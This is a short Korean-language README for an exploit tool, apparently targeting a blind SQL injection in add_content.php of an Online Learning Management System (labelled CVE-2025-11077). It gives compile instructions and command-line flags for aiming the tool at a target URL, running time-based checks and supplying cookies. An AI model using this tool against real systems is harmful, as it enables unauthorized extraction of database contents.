
온라인 학습 관리 시스템(Online Learning Management System)에서 블라인드 SQL 인젝션 악용
저자: Byte Reaper
이 취약점은 Online Learning Management System의 add_content.php 파일에 존재하는 블라인드 SQL 인젝션(Blind SQL Injection)입니다. 공격자는 조작된 POST 요청을 전송하여 데이터베이스 정보를 추출할 수 있습니다.
Linux x86_64
GCC
gcc exploit.c argparse.c -o CVE-2025-11077 -lcurl
- HELP :
./CVE-2025-11077 -h
- Target URL (base url)
./CVE-2025-11077 -u http://[IP]
- log file :
./CVE-2025-11077 -f [FILE]
- Check time-based blind :
./CVE-2025-11077 -u http://[IP] -b
- Cookies FILE :
./CVE-2025-11077 -u http://[IP] -c [FILE]
MIT